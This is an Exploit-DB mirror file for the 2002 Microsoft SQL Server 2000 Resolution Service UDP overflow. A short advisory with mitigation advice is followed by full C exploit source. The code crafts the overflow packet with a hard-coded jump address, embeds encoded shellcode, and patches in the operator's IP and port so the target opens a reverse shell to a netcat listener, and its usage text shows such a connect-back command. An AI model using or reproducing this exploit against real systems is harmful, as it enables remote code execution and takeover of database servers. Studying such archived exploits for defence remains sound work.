exploit-db-mirror/exploits/windows/remote/21652.cpp

source: https://www.securityfocus.com/bid/5310/info

A vulnerability in Microsoft SQL Server 2000 could allow remote attackers to access target hosts.

A problem in the SQL Server Resolution Service allows a remote attacker to execute arbitrary code on a vulnerable host. The attacker could exploit a heap-based buffer overflow in the resolution service by sending a maliciously crafted UDP packet to port 1434.

***UPDATE:

A worm that may exploit this vulnerability has been detected in the wild.

Administrators are advised to:

- Block all external access to database servers until more information is available.
- Deny access to TCP and UDP ports 1434 completely
- Implement filter rules for other ports to decrease the chances of compromise through yet unknown avenues, even if the patch for this particular vulnerability has been installed.

Cisco has released an advisory that details workaround information. Microsoft recommends that affected users apply SQL Server 2000 Service Pack 3.

/*
MSSQL2000 Remote UDP Exploit!

Modified from "Advanced Windows Shellcode" by David Litchfield, david@ngssoftware.com

fix a bug.

Modified by lion, lion@cnhonker.net
Welcome to HUC Website http://www.cnhonker.com

*/


#include <stdio.h>
#include <winsock2.h>

#pragma comment (lib,"Ws2_32")

int GainControlOfSQL(void);
int StartWinsock(void);

struct sockaddr_in c_sa;
struct sockaddr_in s_sa;

struct hostent *he;
SOCKET sock;
unsigned long addr;
int SQLUDPPort=1434;
char host[256]="";
char request[4000]="\x04";
char ping[8]="\x02";

char exploit_code[]=
	"\x55\x8B\xEC\x68\x18\x10\xAE\x42\x68\x1C"
	"\x10\xAE\x42\xEB\x03\x5B\xEB\x05\xE8\xF8"
	"\xFF\xFF\xFF\xBE\xFF\xFF\xFF\xFF\x81\xF6"
	"\xAE\xFE\xFF\xFF\x03\xDE\x90\x90\x90\x90"
	"\x90\x33\xC9\xB1\x44\xB2\x58\x30\x13\x83"
	"\xEB\x01\xE2\xF9\x43\x53\x8B\x75\xFC\xFF"
	"\x16\x50\x33\xC0\xB0\x0C\x03\xD8\x53\xFF"
	"\x16\x50\x33\xC0\xB0\x10\x03\xD8\x53\x8B"
	"\x45\xF4\x50\x8B\x75\xF8\xFF\x16\x50\x33"
	"\xC0\xB0\x0C\x03\xD8\x53\x8B\x45\xF4\x50"
	"\xFF\x16\x50\x33\xC0\xB0\x08\x03\xD8\x53"
	"\x8B\x45\xF0\x50\xFF\x16\x50\x33\xC0\xB0"
	"\x10\x03\xD8\x53\x33\xC0\x33\xC9\x66\xB9"
	"\x04\x01\x50\xE2\xFD\x89\x45\xDC\x89\x45"
	"\xD8\xBF\x7F\x01\x01\x01\x89\x7D\xD4\x40"
	"\x40\x89\x45\xD0\x66\xB8\xFF\xFF\x66\x35"
	"\xFF\xCA\x66\x89\x45\xD2\x6A\x01\x6A\x02"
	"\x8B\x75\xEC\xFF\xD6\x89\x45\xEC\x6A\x10"
	"\x8D\x75\xD0\x56\x8B\x5D\xEC\x53\x8B\x45"
	"\xE8\xFF\xD0\x83\xC0\x44\x89\x85\x58\xFF"
	"\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45"
	"\x84\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98"
	"\x8D\xBD\x48\xFF\xFF\xFF\x57\x8D\xBD\x58"
	"\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83"
	"\xC0\x01\x50\x83\xE8\x01\x50\x50\x8B\x5D"
	"\xE0\x53\x50\x8B\x45\xE4\xFF\xD0\x33\xC0"
	"\x50\xC6\x04\x24\x61\xC6\x44\x24\x01\x64"
	"\x68\x54\x68\x72\x65\x68\x45\x78\x69\x74"
	"\x54\x8B\x45\xF0\x50\x8B\x45\xF8\xFF\x10"
	"\xFF\xD0\x90\x2F\x2B\x6A\x07\x6B\x6A\x76"
	"\x3C\x34\x34\x58\x58\x33\x3D\x2A\x36\x3D"
	"\x34\x6B\x6A\x76\x3C\x34\x34\x58\x58\x58"
	"\x58\x0F\x0B\x19\x0B\x37\x3B\x33\x3D\x2C"
	"\x19\x58\x58\x3B\x37\x36\x36\x3D\x3B\x2C"
	"\x58\x1B\x2A\x3D\x39\x2C\x3D\x08\x2A\x37"
	"\x3B\x3D\x2B\x2B\x19\x58\x58\x3B\x35\x3C"
	"\x58";


int main(int argc, char *argv[])
{
	unsigned int ErrorLevel=0,len=0,c =0;
	int count = 0;
	char sc[300]="";
	char ipaddress[40]="";
	unsigned short port = 0;
	unsigned int ip = 0;
	char *ipt="";
	char buffer[400]="";
	unsigned short prt=0;
	char *prtt="";


	if(argc != 2 && argc != 5)
	{
		printf("===============================================================\r\n");
		printf("SQL Server UDP Buffer Overflow Remote Exploit\r\n\n");
		printf("Modified from \"Advanced Windows Shellcode\"\r\n");
		printf("Code by David Litchfield, david@ngssoftware.com\r\n");
		printf("Modified by lion, fix a bug.\r\n");
		printf("Welcome to HUC Website http://www.cnhonker.com\r\n\n");
		printf("Usage:\r\n");
		printf("    %s Target [<NCHost> <NCPort> <SQLSP>]\r\n\n", argv[0]);
		printf("Exemple:\r\n");
		printf("Target is MSSQL SP 0:\r\n");
		printf("    C:\\>nc -l -p 53\r\n");
		printf("    C:\\>%s db.target.com 202.202.202.202 53 0\r\n",argv[0]);
		printf("Target is MSSQL SP 1 or 2:\r\n");
		printf("    c:\\>%s db.target.com 202.202.202.202\r\n\n", argv[0]);
		return 0;
	}

	strncpy(host, argv[1], 100);

	if(argc == 5)
	{
		strncpy(ipaddress, argv[2], 36);

		port = atoi(argv[3]);

		// SQL Server 2000 Service pack level
		// The import entry for GetProcAddress in sqlsort.dll
		// is at  0x42ae1010 but on SP 1 and 2 is at  0x42ae101C
		// Need to set the last byte accordingly

		if(argv[4][0] == 0x30)
		{
			printf("MSSQL SP 0. GetProcAddress @0x42ae1010\r\n");
			exploit_code[9]=0x10;
		}
		else
		{
			printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101C\r\n");
		}

	}

	ErrorLevel = StartWinsock();
	if(ErrorLevel==0)
	{
		printf("Starting Winsock Error.\r\n");
		return 0;
	}

	if(argc == 2)
	{
		strcpy(request,ping);

		GainControlOfSQL();
		return 0;
	}


	strcpy(buffer,exploit_code);

	// set this IP address to connect back to
	// this should be your address
	ip = inet_addr(ipaddress);
	ipt = (char*)&ip;
	buffer[142]=ipt[0];
	buffer[143]=ipt[1];
	buffer[144]=ipt[2];
	buffer[145]=ipt[3];

	// set the TCP port to connect on
	// netcat should be listening on this port
	// e.g. nc -l -p 80

	prt = htons(port);
	prt = prt ^ 0xFFFF;
	prtt = (char *) &prt;
	buffer[160]=prtt[0];
	buffer[161]=prtt[1];

	strcat(request,"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXX");

	// Overwrite the saved return address on the stack
	// This address contains a jmp esp instruction
	// and is in sqlsort.dll.

	strcat(request,"\xDC\xC9\xB0\x42"); // 0x42B0C9DC

	// Need to do a near jump
	strcat(request,"\xEB\x0E\x41\x42\x43\x44\x45\x46");

	// Need to set an address which is writable or
	// sql server will crash before we can exploit
	// the overrun. Rather than choosing an address
	// on the stack which could be anywhere we'll
	// use an address in the .data segment of sqlsort.dll
	// as we're already using sqlsort for the saved
	// return address

	// SQL 2000 no service packs needs the address here
	strcat(request,"\x01\x70\xAE\x42");

	// SQL 2000 Service Pack 2 needs the address here
	strcat(request,"\x01\x70\xAE\x42");

	// just a few nops
	strcat(request,"\x90\x90\x90\x90\x90\x90\x90\x90");


	// tack on exploit code to the end of our request and fire it off
	strcat(request,buffer);

	GainControlOfSQL();

	return 0;
}


int StartWinsock()
{
	int err=0;
	WORD wVersionRequested;
	WSADATA wsaData;

	wVersionRequested = MAKEWORD(2,1);
	err = WSAStartup( wVersionRequested, &wsaData );
	if (err != 0)
	{
		printf("error WSAStartup 1.\r\n");
		return 0;
	}
	if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 1 )
	{
		printf("error WSAStartup 2.\r\n");
		WSACleanup( );
		return 0;
	}

	if (isalpha(host[0]))
	{
		he = gethostbyname(host);

		if (he == NULL)
		{
			printf("Can't get the ip of %s!\r\n", host);
			WSACleanup( );
			exit(-1);
		}

		s_sa.sin_addr.s_addr=INADDR_ANY;
		s_sa.sin_family=AF_INET;
		memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
	}
	else
	{
		s_sa.sin_family=AF_INET;
		s_sa.sin_addr.s_addr = inet_addr(host);
	}

	return 1;
}



int GainControlOfSQL(void)
{
	char resp[600]="";
	int snd=0,rcv=0,count=0, var=0;
	unsigned int ttlbytes=0;
	unsigned int to=2000;
	struct sockaddr_in        cli_addr;
	SOCKET            cli_sock;


	cli_sock=socket(AF_INET,SOCK_DGRAM,0);
	if (cli_sock==INVALID_SOCKET)
	{
		return printf("sock erron\r\n");
	}

	cli_addr.sin_family=AF_INET;
	cli_addr.sin_addr.s_addr=INADDR_ANY;
	cli_addr.sin_port=htons((unsigned short)53);

	setsockopt(cli_sock,SOL_SOCKET,SO_RCVTIMEO,(char *)&to,sizeof(unsigned int));
	if(bind(cli_sock,(LPSOCKADDR)&cli_addr,sizeof(cli_addr))==SOCKET_ERROR)
	{
		return printf("bind error");
	}

	s_sa.sin_port=htons((unsigned short)SQLUDPPort);

	if (connect(cli_sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
	{
		return printf("Connect error");
	}
	else
	{
		snd=send(cli_sock, request , strlen (request) , 0);
		printf("Packet sent!\r\n");
		printf("If you don't have a shell it didn't work.\r\n");
		rcv = recv(cli_sock,resp,596,0);
		if(rcv > 1)
		{
			while(count < rcv)
			{
				if(resp[count]==0x00)
				resp[count]=0x20;
				count++;
			}
			printf("%s",resp);
		}
	}
	closesocket(cli_sock);

	return 0;
}